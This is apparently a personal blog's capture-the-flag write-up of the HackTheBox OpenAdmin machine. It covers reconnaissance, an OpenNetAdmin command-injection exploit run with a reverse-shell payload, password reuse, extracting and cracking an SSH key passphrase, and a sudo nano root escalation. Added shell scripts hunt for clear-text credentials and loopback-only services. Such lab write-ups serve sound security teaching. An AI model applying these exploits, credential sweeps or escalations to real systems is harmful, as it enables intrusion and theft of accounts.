Ajdin's blog

HackTheBox Openadmin Write Up

2 May 2020

Reconnaissance

Let's see what we have here with nmap.

nmap -sC -sV -O -oA nmap/initial 10.10.10.171
-sC: run the default NSE script scan
-sV: probe open ports to determine service/version info
-O: OS detection
-oA: write the results in all three output formats (normal, XML and grepable) using nmap/initial as the base filename

Nmap returns quickly because by default it only scans the 1000 most common ports, so let's start a full port scan and look at the initial results while it runs.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.171
-p-: scans from port 1 to 65535, same as -p1-65535

[screenshot: initial nmap scan results]

Let’s look at the http server.

[screenshot: default Apache 2 page on port 80]

The site only serves the default Apache 2 page, so let's fire up gobuster to brute-force directories and files.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.171 -x php,html -t 100
-w: use a wordlist
-u: target url
-x: file extensions to append to each word (here php and html)
-t: number of concurrent threads

[screenshot: gobuster results]

Owning user

Gobuster finds /music. Browsing it, the page links to 10.10.10.171/ona. Dirbuster would have found this too, because it parses the HTML it retrieves and follows links; gobuster doesn't do that, but it is much faster. Let's enumerate /ona.

[screenshot: the /ona OpenNetAdmin panel]

It looks like some sort of admin panel. Inspecting further, the page shows it is running OpenNetAdmin version 18.1.1, which is not the latest release. Let's run searchsploit for OpenNetAdmin exploits.

Exploiting OpenNetAdmin with command injection exploit

[screenshot: searchsploit results for OpenNetAdmin]

There is an exploit for the exact version this server is running, and it is a Metasploit module, so we can copy 47772.rb into Metasploit's module tree. Whenever you add a module this way, run reload_all in msfconsole afterwards so it gets picked up. (Metasploit also loads custom modules from ~/.msf4/modules/exploits/..., which survives package upgrades; the system path below works just as well for a lab box.)

searchsploit -m exploits/php/webapps/47772.rb
cp 47772.rb /usr/share/metasploit-framework/modules/exploits/linux/http/

After the modules have been reloaded, select the exploit with use and set its options; check show options to make sure nothing required is left empty.

set lhost <your VPN IP, run "ip addr" to find it>
set rhost 10.10.10.171
set payload linux/x64/shell_reverse_tcp

Running the exploit gives us a shell as www-data; whoami confirms who we are.

[screenshot: shell as www-data]

Privilege escalation with db password

Now we need to escalate privileges. Let's see which users exist on this machine.

[screenshot: user accounts on the box]

We have jimmy and joanna. Let's enumerate the directory we landed in, the OpenNetAdmin install. You have to check every folder from here; the one that matters for escalation is ./local/config, which holds a configuration file with the database password in clear text.
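How that file turns up, as an added example (not code from the write-up): a shell sweep over a web root for configuration files that assign a password-like key. The sample tree it builds is constructed, with made-up values, in the shape of OpenNetAdmin's local/config/database_settings.inc.php; the function names hunt_creds and make_sample_tree are mine.

```shell
#!/bin/sh
# Added example (not from the original write-up): sweep a web root for config
# files that store credentials in clear text. All paths and values below are
# constructed; the sample tree only mimics the shape of OpenNetAdmin's
# local/config/database_settings.inc.php.

# hunt_creds DIR
# Print "file:line:text" for every line in a config-like file under DIR that
# assigns a password/secret-looking key. Exit 0 if anything matched, 1 if not.
hunt_creds() {
    # Key names that usually hold a credential, followed by an assignment in
    # PHP (=> or =), INI/.env (=) or YAML/JSON (:) style. Case-insensitive.
    _re="(passw(or)?d|secret|api_?key|token)[\"']?[[:space:]]*(=>|=|:)"
    # Config-ish extensions only; code, images and vendor blobs are noise.
    _out=$(find "$1" -type f \( -name '*.php' -o -name '*.inc' -o -name '*.conf' \
        -o -name '*.ini' -o -name '*.env' -o -name '.env' -o -name '*.yml' \
        -o -name '*.yaml' -o -name '*.json' -o -name '*.xml' \) \
        -exec grep -HnEi "$_re" {} + 2>/dev/null)
    [ -n "$_out" ] || return 1
    printf '%s\n' "$_out"
}

# make_sample_tree
# Build a constructed web root in a temp dir and print its path.
make_sample_tree() {
    _t=$(mktemp -d)
    mkdir -p "$_t/www/local/config"
    cat > "$_t/www/local/config/database_settings.inc.php" <<'EOF'
<?php
// Constructed sample in the shape of an OpenNetAdmin database settings file.
$ona_contexts = array(
    'DEFAULT' => array(
        'databases' => array(
            0 => array(
                'db_type'     => 'mysqli',
                'db_host'     => 'localhost',
                'db_login'    => 'ona_sys',
                'db_passwd'   => 'Constructed-Example-Pa55',
                'db_database' => 'ona_default',
            ),
        ),
    ),
);
EOF
    printf 'APP_ENV=production\nDB_PASSWORD=another-constructed-value\n' > "$_t/www/.env"
    printf '<?php echo "nothing secret here"; ?>\n' > "$_t/www/index.php"
    printf 'The password policy is documented elsewhere.\n' > "$_t/www/local/config/README.txt"
    printf '%s\n' "$_t"
}

# Demo: run the sweep over the constructed tree, then clean up.
_sample=$(make_sample_tree)
hunt_creds "$_sample"
rm -rf "$_sample"
```

The pattern is deliberately loose (it will flag a `password_hint:` as readily as a real secret), because on a foothold you want to over-collect and read through the hits by hand; the extension filter is what keeps the output short on a real web root.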

[screenshot: database configuration file with the clear-text password]

Passwords get reused, so a fair bet is that one of the users was sloppy and used the database password for their own account. Let's try to ssh in as each of them.

[screenshot: ssh login attempts with the database password]

The password works for jimmy, but his home directory doesn't contain user.txt, so joanna is the user we have to own. This part is a bit trickier and needs another round of enumeration. /var/www contains a second web root besides the default site.

Weird server on localhost

[screenshot: main.php source]

main.php reads joanna's SSH private key and prints it to whoever requests the page, so if we can reach this server we get her key. Amazing, but how do we access it? Let's run netstat.

netstat -lt 
-l: show only listening sockets
-t: TCP only

[screenshot: netstat output]

Port 52846 is listening on localhost only, which is unusual and explains why nmap never saw it. We can't reach it from our browser, but we can curl it from the SSH session on the box.

curl localhost:52846

[screenshot: curl output from localhost:52846]

We get a web page back, so let's request the main.php file we found earlier.

[screenshot: curl output of main.php showing joanna's private key]
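The netstat-to-curl step above, generalised: a small filter, added here as an example and not part of the original write-up, that pulls loopback-only listeners out of `netstat -lt` or `ss -lnt` output. The sample outputs are constructed to resemble this box (port 52846 on localhost) and were not captured from it; loopback_listeners, sample_netstat and sample_ss are my names.

```shell
#!/bin/sh
# Added example (not from the original write-up): pick out services bound only
# to the loopback interface from netstat/ss listening-socket output. The sample
# outputs below are constructed to resemble what this box shows; they are not
# real captures.

# loopback_listeners
# Read `netstat -lt`/`netstat -lnt` or `ss -lnt` output on stdin and print the
# local address of every LISTEN socket bound to 127.x.x.x, localhost or ::1.
# Both tools put the local address in column 4; netstat puts the state in
# column 6 and ss in column 1, and the header lines satisfy neither test.
loopback_listeners() {
    awk '($6 == "LISTEN" || $1 == "LISTEN") &&
         $4 ~ /^(127\.[0-9]+\.[0-9]+\.[0-9]+|localhost|\[?::1\]?):[^:]+$/ { print $4 }'
}

# sample_netstat: constructed `netstat -lt` output (names resolved).
sample_netstat() {
    cat <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:52846         0.0.0.0:*               LISTEN
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.53:domain       0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN
tcp6       0      0 :::http                 :::*                    LISTEN
tcp6       0      0 :::ssh                  :::*                    LISTEN
EOF
}

# sample_ss: constructed `ss -lnt` output (numeric) for the same kind of box.
sample_ss() {
    cat <<'EOF'
State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
LISTEN  0       128          127.0.0.1:52846       0.0.0.0:*
LISTEN  0       80           127.0.0.1:3306        0.0.0.0:*
LISTEN  0       128            0.0.0.0:22          0.0.0.0:*
LISTEN  0       128              [::1]:631            [::]:*
LISTEN  0       511                  *:80                *:*
EOF
}

# Demo: on a live box you would run `netstat -lt | loopback_listeners`.
echo "netstat-style:"; sample_netstat | loopback_listeners
echo "ss-style:";      sample_ss | loopback_listeners
```

Anything it prints is reachable only from the box itself, which is exactly what the nmap scans could never show. Besides curling it from the SSH session, you can bring such a service to your own browser with a local port forward, `ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171`, and then open http://127.0.0.1:52846/ on your machine.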

Cracking the hash with John

Now we have joanna's id_rsa, but we can't use it yet: the key is passphrase-protected, so we have to crack the passphrase. Copy the key to your machine, save it as id_rsa, and copy the ssh2john script so john can work on it.

kali@kali:~/openadmin$ cp /usr/share/john/ssh2john.py .

Redirect ssh2john's output to a file:

kali@kali:~/openadmin$ ./ssh2john.py id_rsa > hash.txt
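Before running john it is worth confirming what the key actually is: a traditional PEM key advertises its encryption in a Proc-Type/DEK-Info header, the newer OpenSSH format records the cipher and KDF inside the base64 body, and an unencrypted key needs no cracking at all. The checker below is an added example, not part of the original write-up; the key files it writes are constructed stubs whose only meaningful parts are the headers and leading fields being inspected, and key_protection and write_samples are my names.

```shell
#!/bin/sh
# Added example (not from the original write-up): before feeding a recovered
# SSH private key to ssh2john/john, confirm it is actually passphrase-protected
# and see which cipher was used. The sample keys below are constructed stubs,
# not real keys: only the headers/leading fields that the check reads are real.

# key_protection FILE
# Print one of:
#   pem-encrypted CIPHER      traditional PEM with a Proc-Type/DEK-Info header
#   pem-plain                 traditional PEM, no passphrase
#   openssh-encrypted CIPHER  OpenSSH "openssh-key-v1" format, cipher != none
#   openssh-plain             OpenSSH format, cipher "none"
#   unknown                   not a private key we recognise
key_protection() {
    if grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        # Body is base64 of: "openssh-key-v1\0", string ciphername, string kdfname,
        # string kdfoptions, ... where each string is a 4-byte length plus bytes.
        # Dropping non-printable bytes leaves the magic directly followed by the
        # cipher name, then the KDF name ("bcrypt" whenever a passphrase is set).
        _blob=$(sed '/^-----/d' "$1" | base64 -d 2>/dev/null | LC_ALL=C tr -cd '[:print:]')
        case $_blob in
            openssh-key-v1none*) echo openssh-plain ;;
            openssh-key-v1*)
                _cipher=$(printf '%s' "$_blob" | sed -e 's/^openssh-key-v1//' -e 's/bcrypt.*//')
                echo "openssh-encrypted $_cipher" ;;
            *) echo unknown ;;
        esac
    elif grep -q '^-----BEGIN .*PRIVATE KEY-----' "$1"; then
        if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
            # DEK-Info: CIPHER,IV-in-hex
            _cipher=$(sed -n 's/^DEK-Info: *\([^,]*\),.*/\1/p' "$1")
            echo "pem-encrypted ${_cipher:-unknown-cipher}"
        else
            echo pem-plain
        fi
    else
        echo unknown
    fi
}

# write_samples DIR
# Create three constructed key stubs in DIR: pem_enc, pem_plain, openssh_enc.
write_samples() {
    cat > "$1/pem_enc" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

Q29uc3RydWN0ZWQsIG5vdCBhIHJlYWwga2V5
-----END RSA PRIVATE KEY-----
EOF
    cat > "$1/pem_plain" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Q29uc3RydWN0ZWQsIG5vdCBhIHJlYWwga2V5
-----END RSA PRIVATE KEY-----
EOF
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        # magic + NUL, len 10 "aes256-ctr", len 6 "bcrypt", len 24 of fake kdfoptions
        printf 'openssh-key-v1\0\0\0\0\012aes256-ctr\0\0\0\006bcrypt\0\0\0\030constructed-salt-bytes!!' | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1/openssh_enc"
}

# Demo over the constructed stubs; on a real engagement: key_protection id_rsa
_d=$(mktemp -d)
write_samples "$_d"
for _k in pem_enc pem_plain openssh_enc; do
    printf '%s: %s\n' "$_k" "$(key_protection "$_d/$_k")"
done
rm -rf "$_d"
```

ssh2john handles both formats, so the result only changes what you expect john to do: a PEM key with AES-128-CBC in DEK-Info or an openssh-key-v1 key using bcrypt are both candidates for a wordlist attack, while pem-plain or openssh-plain means you can skip john and use the key as it is.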

[screenshot: john cracking the key passphrase]

John recovers the passphrase: bloodninjas. Now let's connect as joanna with the key.

[screenshot: ssh login as joanna]

From here we can cat user.txt and we've got the user flag.

joanna@openadmin:~$ cat user.txt
c9b2c...

Getting root

Getting root is fairly easy. Every time you get a shell as a new user, run sudo -l to see whether anything can be run as root and abused to get a shell. Luckily there is a command we can run as root.

[screenshot: sudo -l output]

Whenever sudo -l shows a binary you can run as root, check GTFOBins: it catalogues ways to break out of such programs into a shell or to read and write files as the privileged user. Run the command above with sudo and use the nano entry to get a root shell. (You could also use the file-read GTFOBin to read the flag directly without spawning a shell.)

Privilege escalation with Nano

[screenshot: breaking out of nano]

The GTFOBins sequence is Ctrl+R followed by Ctrl+X to open nano's execute-command prompt, then a command that spawns a shell with its output redirected back onto the terminal. You might get confused because nano's interface stays drawn on the screen and the first few commands overwrite it, but just keep typing: whoami shows you are root and cat /root/root.txt gives the flag.

$ whoami 
root
$ cat /root/root.txt
2f907...

That is how I gained root on this box. I hope you learned something from this write-up.
